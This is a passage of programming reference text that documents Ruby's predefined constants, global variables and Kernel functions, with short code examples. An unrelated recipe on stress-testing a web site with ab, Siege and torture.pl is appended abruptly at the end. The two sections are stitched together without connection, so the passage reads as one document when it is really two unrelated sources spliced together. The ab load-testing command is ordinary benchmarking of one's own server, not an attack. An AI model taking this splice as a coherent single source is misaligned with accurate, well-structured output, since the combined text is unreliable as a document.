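# DEMO_GREETING and DEMO_MISSING are hypothetical environment variable names.
def env_demo
  ENV["DEMO_GREETING"] = "hello"   # keys and values must be strings
  results = {
    lookup:   ENV["DEMO_GREETING"],                  # hash-style read
    present:  ENV.key?("DEMO_GREETING"),             # membership test
    fallback: ENV.fetch("DEMO_MISSING", "default"),  # default for an unset variable
    is_hash:  ENV.is_a?(Hash),                       # ENV is hash-like, not a Hash
    snapshot: ENV.to_hash.class                      # to_hash copies it into a real Hash
  }
  ENV.delete("DEMO_GREETING")      # clean up the variable we set
  results
end
```

Changes made through ENV affect the current process and any child processes it starts afterward, not the shell that launched the interpreter.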






      FALSE



      A deprecated synonym for false.






      NIL



      A deprecated synonym for nil.






      RUBY_PATCHLEVEL



      A string indicating the patchlevel for the interpreter.






      RUBY_PLATFORM



      A string indicating the platform of the Ruby interpreter.






      RUBY_RELEASE_DATE



      A string indicating the release date of the Ruby interpreter.






      RUBY_VERSION



      A string indicating the version of the Ruby language supported by the
      interpreter.






      STDERR



      The standard error output stream. This is the default
      value of the $stderr variable.






      STDIN



      The standard input stream. This is the default value of the
      $stdin variable.






      STDOUT



      The standard output stream. This is the default value of the
      $stdout variable.






      TOPLEVEL_BINDING



      A Binding object representing the
      bindings in the top-level scope.






      TRUE



      A deprecated synonym for true.






      10.2.3. Global Variables


      The Ruby interpreter predefines a number of global variables that your
      programs can use. Many of these variables are special in some way. Some
      use punctuation characters in their names. (The
      English.rb module defines English-language
      alternatives to the punctuation. Add require 'English'
      to your program if you want to use these verbose
      alternatives.) Some are read-only and may not be assigned to. And some
      are thread-local, so that each thread of a Ruby program may see a
      different value of the variable. Finally, some global variables
      ($_, $~, and the pattern-matching
      variables derived from it) are method-local: although the variable is
      globally accessible, its value is local to the current method. If a
      method sets the value of one of these magic globals, it does not alter
      the value seen by the code that invokes that method.
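The method-local behavior described above can be seen in a short sketch. The method names inner_match and outer_match are hypothetical; the point is only that a match performed inside a called method does not disturb $~ in the caller:

```ruby
# Performs its own pattern match, which sets $~ for this method only.
def inner_match
  "inner text" =~ /inner/
  $~[0]
end

# Matches, calls inner_match, then inspects its own $~ again.
def outer_match
  "outer text" =~ /outer/
  from_inner = inner_match
  [from_inner, $~[0]]   # the caller's $~ still refers to the "outer" match
end
```

Calling outer_match returns ["inner", "outer"]: each method sees only the result of its own most recent match.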


      You can obtain the complete list of global variables predefined by
      your Ruby interpreter with:


      ruby -e 'puts global_variables.sort'



      To include the verbose names from the English
      module in your listing, try:


      ruby -rEnglish -e 'puts global_variables.sort'



      The subsections that follow document the predefined global
      variables by category.



      10.2.3.1. Global settings

      These global variables hold configuration settings and specify
      information, such as command-line arguments, about the environment in
      which the Ruby program is running:





      $*



      A read-only synonym for the ARGV
      constant. English synonym: $ARGV.






      $$



      The process ID of the current Ruby process. Read-only.
      English synonyms: $PID,
      $PROCESS_ID.






      $?



      The exit status of the last process terminated.
      Read-only and thread-local. English synonym:
      $CHILD_STATUS.






      $DEBUG




      $-d



      Set to true if the
      -d or --debug options were
      set on the command line.






      $KCODE




      $-K



      In Ruby 1.8, this variable holds a string that names the
      current text encoding. Its value is "NONE", "UTF8", "SJIS" or
      "EUC". This value can be set with the interpreter option
      -K. This variable no longer works in Ruby 1.9
      and using it causes a warning.






      $LOADED_FEATURES




      $"



      An array of strings naming the files that have been
      loaded. Read-only.






      $LOAD_PATH




      $:




      $-I



      An array of strings holding the directories to be searched
      when loading files with the load and
      require methods. This variable is read-only,
      but you can alter the contents of the array to which it refers,
      appending or prepending new directories to the path, for
      example.
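A minimal sketch of the distinction between the read-only variable and the mutable array it refers to. The method names and the directory passed in are hypothetical:

```ruby
# Prepends a directory to the load path by mutating the array in place.
def prepend_to_load_path(dir)
  $LOAD_PATH.unshift(dir) unless $LOAD_PATH.include?(dir)
  $LOAD_PATH.first
end

# Attempts to rebind the variable itself, which the interpreter rejects.
def try_reassign_load_path
  $LOAD_PATH = []
  :reassigned
rescue NameError => e
  e.class
end
```

Mutating the array succeeds, while the assignment raises NameError because the variable itself is read-only. $: refers to the same array, so either name can be used for the mutation.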






      $PROGRAM_NAME




      $0



      The name of the file that holds the Ruby program currently
      being executed. The value will be "-" if the
      program is read from standard input, or "-e"
      if the program was specified with a -e
      option. Note that this is different from
      $FILENAME.






      $SAFE



      The current safe level for program execution. See Section 10.5
      for details. This variable may be set from the command line with
      the -T option. The value of this variable is
      thread-local.






      $VERBOSE




      $-v




      $-w



      True if the -v, -w,
      or --verbose command-line option is
      specified. nil if -W0 was
      specified. false otherwise. You can set this
      variable to nil to suppress all
      warnings.
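The effect of setting $VERBOSE to nil can be sketched as follows. The helper name capture_warning is an assumption for this example; it temporarily redirects $stderr to a StringIO so that the output of Kernel's warn function can be inspected:

```ruby
require 'stringio'

# Runs warn with the given $VERBOSE setting and returns whatever was written
# to $stderr. Both globals are restored afterward.
def capture_warning(verbose)
  saved_verbose, saved_stderr = $VERBOSE, $stderr
  $stderr = StringIO.new
  $VERBOSE = verbose
  warn "careful"
  $stderr.string
ensure
  $VERBOSE, $stderr = saved_verbose, saved_stderr
end
```

With $VERBOSE set to false the warning is still written; with nil, warn produces no output at all.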






      10.2.3.2. Exception-handling globals

      The following two global variables are useful in
      rescue clauses when an exception has been
      raised:





      $!



      The last exception object raised. The exception
      object can also be accessed using the =>
      syntax in the declaration of the rescue
      clause. The value of this variable is thread-local. English
      synonym: $ERROR_INFO.






      $@



      The stack trace of the last exception, equivalent to
      $!.backtrace. This value is thread-local.
      English synonym: $ERROR_POSITION.
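As a brief sketch of how these two globals relate to the => syntax, the hypothetical method below raises an exception and compares $! and $@ with the object bound in the rescue clause:

```ruby
# Raises and rescues an exception, then reports how $! and $@ relate to
# the exception object named by the rescue clause.
def rescue_details
  raise ArgumentError, "bad input"
rescue ArgumentError => e
  {
    same_object: $!.equal?(e),        # $! is the very same exception object
    same_trace:  $@ == e.backtrace,   # $@ matches the exception's backtrace
    message:     $!.message
  }
end
```

Naming the exception with => is usually clearer than relying on the punctuation globals, but both refer to the same object inside the rescue clause.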






      10.2.3.3. Streams and text-processing globals

      The following globals are IO streams and variables that
      affect the default behavior of text-processing
      Kernel methods. You'll find examples of their use
      in Section 10.3:





      $_



      The last string read by the Kernel
      methods gets and readline.
      This value is thread-local and method-local. A number of
      Kernel methods operate implicitly on
      $_. English synonym:
      $LAST_READ_LINE.






      $<



      A read-only synonym for the ARGF
      stream: an IO-like object providing access to
      a virtual concatenation of the files specified on the
      command-line, or to standard input if no files were specified.
      Kernel read methods, such as
      gets, read from this stream. Note that this
      stream is not always the same as $stdin.
      English synonym: $DEFAULT_INPUT.






      $stdin



      The standard input stream. The initial value of this
      variable is the constant STDIN. Many Ruby
      programs read from ARGF or
      $< instead of
      $stdin.






      $stdout




      $>



      The standard output stream, and the destination of the
      printing methods of Kernel: puts,
      print, printf, etc.
      English synonym: $DEFAULT_OUTPUT.
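Because the printing methods write to whatever $stdout currently refers to, output can be redirected by assigning a different stream. The following is only a sketch; the helper name capture_stdout is hypothetical, and StringIO stands in for any object with a write method:

```ruby
require 'stringio'

# Temporarily points $stdout at a StringIO, runs the block, and returns
# everything the block printed. The original stream is always restored.
def capture_stdout
  saved = $stdout
  $stdout = StringIO.new
  yield
  $stdout.string
ensure
  $stdout = saved
end

CAPTURED = capture_stdout do
  puts "hello"      # puts appends a newline
  print "a", "b"    # print does not
end
```

The constant STDOUT is unaffected by the assignment, so the original stream remains available while $stdout is redirected.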






      $stderr



      The standard error output stream. The initial value of this variable
      is the constant STDERR.






      $FILENAME



      The name of the file currently being read from
      ARGF. Equivalent to
      ARGF.filename. Read-only.






      $.



      The number of the last line read from the current input file.
      Equivalent to ARGF.lineno. English synonyms:
      $NR,
      $INPUT_LINE_NUMBER.






      $/




      $-0



      The input record separator (newline by default).
      gets and readline use this
      value by default to determine line boundaries. You can set this
      value with the -0 interpreter option. English
      synonyms: $RS,
      $INPUT_RECORD_SEPARATOR.






      $\



      The output record separator. The default value is
      nil, but is set to $/ when
      the interpreter option -l is used. If
      non-nil, the output record separator is
      output after every call to print (but not
      puts or other output methods). English
      synonyms: $ORS,
      $OUTPUT_RECORD_SEPARATOR.






      $,



      The separator output between the arguments to
      print and the default separator for
      Array.join. The default is
      nil. English synonyms:
      $OFS, $OUTPUT_FIELD_SEPARATOR.






      $;




      $-F



      The default field separator used by split. The
      default is nil, but you can specify a value
      with the interpreter option -F. English
      synonyms: $FS,
      $FIELD_SEPARATOR.






      $F



      This variable is defined if the Ruby interpreter is invoked with
      the -a option and either
      -n or -p. It holds the
      fields of the current input line, as returned by
      split.






      10.2.3.4. Pattern-matching globals

      The following globals are thread-local and method-local and are
      set by any Regexp pattern-matching
      operation:





      $~



      The MatchData object produced by
      the last pattern matching operation. This value is thread-local
      and method-local. The other pattern-matching globals described
      here are derived from this one. Setting this variable to a new
      MatchData object alters the value of the
      other variables. English synonym:
      $MATCH_INFO.






      $&



      The most recently matched text. Equivalent to
      $~[0]. Read-only, thread-local, method-local,
      and derived from $~. English synonym:
      $MATCH.






      $`



      The string preceding the match in the last pattern match. Equivalent to
      $~.pre_match. Read-only, thread-local,
      method-local, and derived from $~. English
      synonym: $PREMATCH.






      $'



      The string following the match in the last pattern match.
      Equivalent to $~.post_match. Read-only,
      thread-local, method-local, and derived from
      $~. English synonym:
      $POSTMATCH.






      $+



      The string corresponding to the last successfully matched
      group in the last pattern match. Read-only, thread-local,
      method-local, and derived from $~. English
      synonym:
      $LAST_PAREN_MATCH.
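The relationship between $~ and the variables derived from it can be sketched with a small helper. The method name match_globals is hypothetical; it collects the globals immediately after a match, inside the same method, because they are method-local:

```ruby
# Matches text against pattern and returns the pattern-matching globals,
# or nil if there is no match.
def match_globals(text, pattern)
  return nil unless text =~ pattern
  {
    match_data: $~,   # the MatchData object itself
    matched:    $&,   # same as $~[0]
    pre:        $`,   # same as $~.pre_match
    post:       $',   # same as $~.post_match
    last_group: $+    # last group that participated in the match
  }
end

RESULT = match_globals("The quick brown fox", /(qu)(ick)/)
```

For this input, the matched text is "quick", the text before it is "The ", the text after it is " brown fox", and the last matched group is "ick".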






      10.2.3.5. Command-line option globals

      Ruby defines a number of global variables that correspond to the
      state or value of interpreter command-line options. The variables
      $-0, $-F,
      $-I, $-K,
      $-d, $-v, and
      $-w have synonyms and are documented in the previous
      sections. The remaining variables are listed here:





      $-a



      true if the interpreter option
      -a was specified; false
      otherwise. Read-only.






      $-i



      nil if the interpreter option
      -i was not specified. Otherwise, this
      variable is set to the backup file extension specified with
      -i.






      $-l



      true if the -l
      option was specified. Read-only.






      $-p



      true if the interpreter option
      -p was specified; false
      otherwise. Read-only.






      $-W



      In Ruby 1.9, this global variable specifies the current
      verbose level. It is 0 if the -W0 option was used, and is
      2 if any of the options
      -w, -v, or
      --verbose were used. Otherwise, this variable
      is 1. Read-only.







      10.2.4. Predefined Global Functions


      The Kernel module, which is included by
      Object, defines a number of private instance methods
      that serve as global functions. Because they are private, they must be
      invoked functionally, without an explicit receiver object. And because
      they are included by Object, they can be invoked
      anywhere—no matter what the value of self is, it will
      be an object, and these methods can be implicitly invoked on it. The
      functions defined by Kernel can be grouped into
      several categories, most of which are covered elsewhere in this chapter
      or elsewhere in this book.
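The consequence of these functions being private can be sketched as follows. The two method names are hypothetical, and the example assumes Ruby 1.9 or later. It uses format rather than puts so that nothing is printed:

```ruby
# Functional invocation: no explicit receiver, so the private method is reachable.
def functional_call
  format("%03d", 7)
end

# Invocation with an explicit receiver: rejected because the method is private.
def receiver_call
  Object.new.format("%03d", 7)
  :allowed
rescue NoMethodError
  :private_method_error
end
```

The functional call returns the formatted string, while the call on an explicit receiver raises NoMethodError, even though every object inherits the method through Object.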



      10.2.4.1. Keyword functions

      The following Kernel functions behave like
      language keywords and are documented elsewhere in this book:


      block_given?    iterator?       loop            require
      callcc          lambda          proc            throw
      catch           load            raise





      10.2.4.2. Text input, output, and manipulation functions

      Kernel defines the following functions, most
      of which are global variants of IO methods. They
      are covered in more detail in Section 10.3:


      format          print           puts            sprintf
      gets            printf          readline
      p               putc            readlines



      In Ruby 1.8 (but not 1.9), Kernel also
      defines the following global variants of String
      methods that operate implicitly on $_:


      chomp   chop    gsub    scan    sub
      chomp!  chop!   gsub!   split   sub!





      10.2.4.3. OS methods

      The following Kernel functions allow a Ruby
      program to interface with the operating system. They are
      platform-dependent and are covered in Section 10.4. Note that
      ` is the specially named backtick method that
      returns the text output by an arbitrary OS shell command:


      `       fork    select  system  trap
      exec    open    syscall test





      10.2.4.4. Warnings, failures, and exiting

      The following Kernel functions display
      warnings, raise exceptions, cause the program to exit, or register
      blocks of code to be run when the program terminates. They are
      documented along with OS-specific methods in Section 10.4:


      abort   at_exit exit    exit!   fail    warn





      10.2.4.5. Reflection functions

      The following Kernel functions are part of
      Ruby's reflection API and were described in Chapter 8:


      binding                         set_trace_func
      caller                          singleton_method_added
      eval                            singleton_method_removed
      global_variables                singleton_method_undefined
      local_variables                 trace_var
      method_missing                  untrace_var
      remove_instance_variable





      10.2.4.6. Conversion functions

      The following Kernel functions attempt to
      convert their arguments to a new type. They were described in Section 3.8.7.3:


      Array   Float   Integer String
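A few calls give a feel for how these conversion functions behave. The helper to_integer_or_nil and the constant CONVERSIONS are hypothetical names added for this sketch:

```ruby
# Strict conversion: returns nil instead of raising when the argument
# cannot be interpreted as an integer.
def to_integer_or_nil(value)
  Integer(value)
rescue ArgumentError, TypeError
  nil
end

CONVERSIONS = [
  Integer("42"),   # a numeric string becomes an Integer
  Float("3.5"),    # a numeric string becomes a Float
  Array(nil),      # nil becomes an empty array
  Array(1..3),     # a range is expanded into an array
  String(42)       # any object is converted via to_s
]
```

Unlike the to_i method of String, which returns 0 for input it cannot parse, Integer raises an exception, which is why the helper rescues it.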





      10.2.4.7. Miscellaneous Kernel functions

      The following miscellaneous Kernel functions
      don't fit into the previous categories:


      autoload                rand                    srand
      autoload?               sleep



      rand and srand are for
      generating random numbers, and are documented in Section 9.3.7. autoload and
      autoload? are covered in Section 7.6.3. And sleep is covered in
      Section 9.9 and Section 10.4.4.





      10.2.5. User-Defined Global Functions


      When you define a method with def inside a
      class or module declaration and do
      not specify a receiver object for the method, the method is created as a
      public instance method of self, where
      self is the class or module you are defining. Using
      def at the top level, outside of any
      class or module, is different in
      two important ways. First, top-level methods are instance methods of
      Object (even though self is not
      Object). Second, top-level methods are always
      private.



      Top-Level self: the Main Object


      Because top-level methods become instance methods of
      Object, you might expect that the value of
      self would be Object. In fact,
      however, top-level methods are a special case: methods are defined in
      Object, but self is a different
      object. This special top-level object is known as the "main" object,
      and there is not much to say about it. The class of the
      main object is Object, and it
      has a singleton to_s method that returns the string
      "main".




      The fact that top-level methods are defined in
      Object means that they are inherited by all objects
      (including Module and Class) and
      (if not overridden) can be used within any class or instance method
      definition. (You can review Ruby's method name resolution algorithm in
      Section 7.8 to convince yourself of this.) The fact
      that top-level methods are private means that they must be invoked like
      functions, without an explicit receiver. In this way, Ruby mimics a
      procedural programming paradigm within its strictly object-oriented
      framework.
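The points above can be sketched in a few lines, assuming the code is run as a script so that the def appears at the top level. The names shout, Greeter, and explicit_receiver_call are hypothetical:

```ruby
# Defined at the top level: becomes a private instance method of Object.
def shout(text)
  text.upcase + "!"
end

class Greeter
  # Any object can call the top-level method functionally.
  def greet(name)
    shout("hello #{name}")
  end
end

# Calling it with an explicit receiver fails because the method is private.
def explicit_receiver_call
  "anything".shout("hi")
  :allowed
rescue NoMethodError
  :private
end

# The top-level self is the main object, whose to_s returns "main".
MAIN_NAME = TOPLEVEL_BINDING.eval("self").to_s
```

Greeter.new.greet("ruby") returns "HELLO RUBY!", while explicit_receiver_call returns :private. Note that interactive tools such as irb may define top-level methods differently, so this sketch applies to code run from a file.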










      Recipe 21.4. Stress Testing Your Web Site













      21.4.1. Problem


      You want to find out how well your web site performs under a heavy load.




      21.4.2. Solution


      Use a stress-testing and benchmarking tool to simulate a variety of load levels.




      21.4.3. Discussion


      Stress testing is frequently confused with benchmarking, and it is important to recognize the difference between the two activities.


      Benchmarking a web site is often a somewhat casual activity when performed by an individual developer. The most commonly used tool is the Apache HTTP server benchmarking tool, ab, which is designed to test how many requests per second an HTTP server is capable of serving. For example:


      % /usr/bin/ab -n 1000 -c 100 -k www.example.com/test.php



      This test would return a report illustrating the average response time for requests to http://www.example.com/test.php, based on 1,000 requests, grouped in batches of 100 concurrent requests.


      While that sort of test has value (it gives you a reasonable estimate of how many requests you can serve per second under normal load), it doesn't tell you much about how your entire web application will behave under heavy load. It only pounds on one URL at a time, after all.


      Stress testing is a testing technique whose intent is to break your web application. By testing to a breaking point, you can identify and repair weaknesses in your application, or gain a better understanding of when you will need to add additional hardware. When combined with code profiling, you can also get an idea of what part of your application will need to scale first; i.e., will you need to add more servers to your database cluster before you need to add more frontend web server machines?


      An excellent open source tool for stress testing is Siege. Siege can be configured to read a large number of URLs from a configuration file and run through them in order (regression testing), or it can read a list of URLs and hit them randomly, which better approximates real-world usage of a web site. Siege can also pound on a single URL in a similar fashion to ab.


      If you are unable to install Siege on your system, Lincoln Stein's torture.pl script is a good alternative. Many of Siege's design concepts were inspired by torture.pl, and the two tools produce similar reports.




      21.4.4. See Also


      Source and documentation for Siege at http://www.joedog.org/JoeDog/Siege; ab at http://httpd.apache.org/docs/2.0/programs/ab.html; source and documentation for torture.pl at http://stein.cshl.org/~lstein/torture/.